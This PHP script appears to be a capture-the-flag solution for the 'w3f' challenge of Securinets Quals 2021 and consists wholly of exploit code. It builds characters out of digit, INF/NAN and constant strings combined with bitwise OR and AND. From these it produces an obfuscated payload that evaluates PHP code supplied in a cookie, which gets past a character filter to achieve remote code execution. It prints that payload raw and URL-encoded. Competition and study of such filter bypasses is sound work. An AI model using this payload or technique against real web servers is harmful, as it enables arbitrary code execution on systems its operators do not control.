for Securinets Quals 2k21 - w3f

gen.php

<?php
// utils
function add(&$table, $k, $v) {
  if (array_key_exists($k, $table) && strlen($v) >= strlen($table[$k])) {
    return;
  }

  $table[$k] = $v;
}

function go(&$table) {
  $keys = array_keys($table);

  foreach ($keys as $ck) {
    foreach ($keys as $dk) {
      $cv = $table[$ck];
      $dv = $table[$dk];

      add($table, ord(chr($ck) | chr($dk)), "(({$cv})|({$dv}))");
      add($table, ord(chr($ck) & chr($dk)), "(({$cv})&({$dv}))");
    }
  }
}

function dump_table($table) {
  $keys = array_keys($table);
  sort($keys);

  $res = '';

  foreach ($keys as $k) {
    if (0x20 <= $k && $k < 0x7f) {
      $res .= chr($k);
    }
  }

  echo $res . "\n";
}

function encode($table, $s) {
  $res = '';

  for ($i = 0; $i < strlen($s); $i++) {
    $res .= '(' . $table[ord($s[$i])] . ').';
  }

  return substr($res, 0, -1);
}

// init
$table = [];

// 0-9
for ($c = 0x30; $c <= 0x39; $c++) {
  $d = chr($c);
  $s = "(({$d}).(0))" . '{0}';
  $table[$c] = $s;
}

$table[ord('.')] = '((0.1).(0)){1}';
$table[ord('-')] = '(((-1).(1)){0})';
$table[ord('+')] = '(((10**19).(1)){4})';
$table[ord('E')] = '((10**19).(0)){3}';
$table[ord('I')] = '(((1/0).(1/0)){0})';
$table[ord('N')] = '(((1/0).(1/0)){1})';
$table[ord('F')] = '(((1/0).(1/0)){2})';

$table[ord('e')] = '((_e){1})';
$table[ord('v')] = '((_v){1})';
$table[ord('a')] = '((_a){1})';
$table[ord('l')] = '((_l){1})';

// make table
go($table);
go($table);

// yay
$payload = 'eval((START.DOLLAR._.COOKIE.POYO.END))';
$payload = preg_replace('/DOLLAR/', encode($table, '$'), $payload);
$payload = preg_replace('/COOKIE/', encode($table, 'COOKIE'), $payload);
$payload = preg_replace('/POYO/', encode($table, '{0}'), $payload);
$payload = preg_replace('/START/', encode($table, 'eval('), $payload);
$payload = preg_replace('/END/', encode($table, ');'), $payload);

$len = strlen($payload);
echo "length: {$len}\n$payload\n";
echo urlencode($payload) . "\n";